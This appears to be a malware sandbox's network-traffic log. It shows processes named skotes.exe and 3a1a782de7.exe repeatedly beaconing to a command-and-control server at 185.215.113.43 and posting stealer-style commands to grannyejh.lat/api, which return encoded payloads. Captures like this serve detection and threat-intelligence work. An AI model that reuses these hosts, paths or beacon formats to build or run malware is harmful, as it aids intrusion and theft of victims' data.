Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:03.373311996 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:04.711426973 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.8	50148	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:06.465200901 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:07.795100927 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.8	50149	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:09.434582949 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:11.474951029 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.8	50150	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:13.294001102 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:14.642637968 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.8	50151	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:16.278568029 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:17.650423050 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.8	50152	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:19.404297113 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:20.735722065 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.8	50153	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:22.372049093 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:23.707245111 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.8	50154	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:25.451508999 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:26.782825947 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.8	50155	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:28.418987989 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:29.835589886 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.8	50156	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:31.592919111 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:32.971890926 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.8	50157	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:34.609826088 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:35.947015047 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.8	50158	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:37.704494953 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:39.042736053 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.8	50159	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:40.669787884 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:42.011512995 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Dec 18, 2024 13:45:42.404453039 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.8	50160	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:43.764759064 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:45.098134041 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.8	50161	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:46.731122971 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:45:48.151258945 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:27 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-18 12:38:27 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 12:38:31 UTC	1025	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p625u8ltambt2mcvhf278ba9rf; expires=Sun, 13-Apr-2025 06:25:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4TqI3fQiH9EzjjZuvCv19VyfI0bApqEhD3UFgBJAoj73fdYd4VE9PinsjxBXV3TdXPe7bSGU4igGd2uX989QY9rfDT0t%2BNSV5fLuYwRqFxhzPJmaNnUbEC4TmFM0AhC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f35c82c17c454-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1466&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1936339&cwnd=162&unsent_bytes=0&cid=0131fb91fc8982b9&ts=4093&x=0"
2024-12-18 12:38:31 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 12:38:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49716	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:32 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: grannyejh.lat
2024-12-18 12:38:32 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6989783370&j=
2024-12-18 12:38:38 UTC	1029	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vnhrn68a2fn13jphsngtu80fud; expires=Sun, 13-Apr-2025 06:25:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFzboaNxrVN6YjuczF5xkm9rfPTNjX9zVzvka0FZekJHU6t17HqIgjHOIV%2BBL%2FxUwQmhvjdKzBM5k6ktaaxTakvf0VqSrUXITeeNA%2Bi4nTTs20hJ4qS4ujUk67Jqd8rr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f35e9cdcb4382-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=949&delivery_rate=1757977&cwnd=248&unsent_bytes=0&cid=ea4086dc63ac5512&ts=5328&x=0"
2024-12-18 12:38:38 UTC	340	IN	Data Raw: 34 65 32 0d 0a 4f 48 59 4a 50 72 64 66 32 76 33 52 78 48 6f 50 6c 78 38 44 6a 4c 34 53 2f 4f 5a 4a 30 4b 47 4e 2b 2f 59 33 41 72 6f 6c 66 4b 46 44 56 48 38 63 6a 57 76 32 33 36 4b 68 57 44 58 6a 62 58 62 70 6b 6a 43 64 67 6d 76 71 78 2b 79 58 68 56 49 75 6d 46 4d 52 67 77 49 51 61 46 4c 45 4f 76 62 66 74 4c 78 59 4e 63 78 6b 49 65 6e 51 4d 4d 62 45 4c 4c 72 44 37 4a 65 55 56 6d 6e 56 56 52 44 43 55 42 70 75 56 74 49 38 76 70 79 39 71 52 39 71 38 6e 35 70 34 74 64 2f 6c 49 74 72 2f 49 50 6f 67 64 51 4e 49 50 64 41 43 4d 42 31 46 33 70 56 6c 53 4c 32 68 76 4f 68 46 43 32 74 50 57 4c 70 33 48 36 61 67 69 4b 34 79 65 57 66 6c 56 4e 6f 79 6b 77 61 79 56 41 55 62 56 66 59 4e 61 71 52 74 36 34 55 62 50 68 2b 49 61 43 63 64 34 62 45 63 2f 4b 51 33 5a 71 46 52 48 Data Ascii: 4e2OHYJPrdf2v3RxHoPlx8DjL4S/OZJ0KGN+/Y3ArolfKFDVH8cjWv236KhWDXjbXbpkjCdgmvqx+yXhVIumFMRgwIQaFLEOvbftLxYNcxkIenQMMbELLrD7JeUVmnVVRDCUBpuVtI8vpy9qR9q8n5p4td/lItr/IPogdQNIPdACMB1F3pVlSL2hvOhFC2tPWLp3H6agiK4yeWflVNoykwayVAUbVfYNaqRt64UbPh+IaCcd4bEc/KQ3ZqFRH
2024-12-18 12:38:38 UTC	917	IN	Data Raw: 35 6d 45 41 53 67 77 4a 55 62 56 4c 55 4d 4c 69 4e 75 36 30 54 61 4f 64 32 61 4f 50 52 63 4a 4f 4f 4a 4c 48 44 36 4a 4f 65 57 6d 72 63 53 68 50 46 57 68 51 72 45 70 55 36 6f 4e 2f 72 35 6a 74 6f 35 58 70 74 2b 4a 35 4b 33 70 74 6c 71 34 50 6f 6c 64 51 4e 49 4e 42 43 48 63 42 52 47 32 68 55 33 69 2b 34 6a 62 57 72 48 58 2f 7a 65 47 2f 6b 33 32 4b 55 69 69 32 78 79 75 53 51 6b 56 4a 6b 6d 41 6c 65 78 45 4a 55 4d 78 7a 30 4d 4c 4f 54 75 62 45 59 4c 65 6f 7a 65 4b 37 62 66 4e 37 63 61 37 62 43 36 35 69 51 57 32 37 63 53 78 6a 4e 56 78 74 74 56 74 55 36 73 70 65 37 70 78 56 6d 2b 6e 31 6b 34 39 68 32 6b 6f 55 75 38 6f 32 76 6e 6f 77 56 4f 4a 68 70 47 63 42 49 56 6c 35 66 32 7a 4f 2f 69 66 4f 35 56 6e 53 31 65 6d 32 75 68 44 43 51 67 53 53 67 77 76 32 63 6d 6b Data Ascii: 5mEASgwJUbVLUMLiNu60TaOd2aOPRcJOOJLHD6JOeWmrcShPFWhQrEpU6oN/r5jto5Xpt+J5K3ptlq4PoldQNINBCHcBRG2hU3i+4jbWrHX/zeG/k32KUii2xyuSQkVJkmAlexEJUMxz0MLOTubEYLeozeK7bfN7ca7bC65iQW27cSxjNVxttVtU6spe7pxVm+n1k49h2koUu8o2vnowVOJhpGcBIVl5f2zO/ifO5VnS1em2uhDCQgSSgwv2cmk
2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 34 34 33 61 0d 0a 34 51 62 66 68 38 61 75 62 61 66 5a 57 4c 4a 4c 58 4c 37 4a 57 52 57 47 4f 59 43 56 37 45 51 6c 51 7a 48 50 41 7a 75 34 36 69 35 43 31 75 2b 33 4e 6d 2b 4a 78 76 30 4a 31 72 74 63 2b 76 77 64 52 66 5a 39 39 44 45 38 6c 5a 45 47 39 52 32 6a 53 78 6c 71 47 73 46 47 50 6e 63 47 76 72 30 6e 79 62 69 79 75 7a 77 75 47 54 6e 78 55 75 6d 45 41 47 67 77 4a 55 52 46 48 46 4c 37 4b 55 6f 75 51 74 62 76 74 7a 5a 76 69 63 62 39 43 64 61 37 58 50 72 38 48 55 58 6d 62 55 53 78 37 46 53 42 70 6b 54 74 38 76 76 4a 47 33 71 68 5a 6b 2b 48 4a 6b 2f 4e 68 77 6a 49 55 75 74 63 33 69 69 35 45 56 4c 70 68 41 42 6f 4d 43 56 46 46 6f 30 69 32 70 6d 50 47 54 47 32 50 37 65 6e 65 75 77 7a 36 48 78 43 79 2b 67 37 66 5a 6c 31 6c 74 30 55 49 52 30 56 41 59 61 6b 37 Data Ascii: 443a4Qbfh8aubafZWLJLXL7JWRWGOYCV7EQlQzHPAzu46i5C1u+3Nm+Jxv0J1rtc+vwdRfZ99DE8lZEG9R2jSxlqGsFGPncGvr0nybiyuzwuGTnxUumEAGgwJURFHFL7KUouQtbvtzZvicb9Cda7XPr8HUXmbUSx7FSBpkTt8vvJG3qhZk+HJk/NhwjIUutc3ii5EVLphABoMCVFFo0i2pmPGTG2P7eneuwz6HxCy+g7fZl1lt0UIR0VAYak7
